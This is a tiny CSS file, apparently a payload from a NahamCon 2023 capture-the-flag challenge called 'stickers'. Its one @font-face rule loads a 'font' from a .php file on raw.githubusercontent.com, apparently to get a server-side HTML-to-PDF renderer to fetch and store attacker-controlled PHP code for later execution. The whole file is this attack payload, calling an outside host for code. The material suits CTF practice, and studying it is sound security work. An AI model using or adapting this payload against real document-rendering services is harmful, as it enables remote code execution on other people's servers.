@font-face {
    font-style: 'normal';
    font-weight: 'normal';
    font-family: 'superfont';
    src: url('https://raw.githubusercontent.com/v3he/ctfs/master/nahamcon2023/stickers/superfont.php');
}
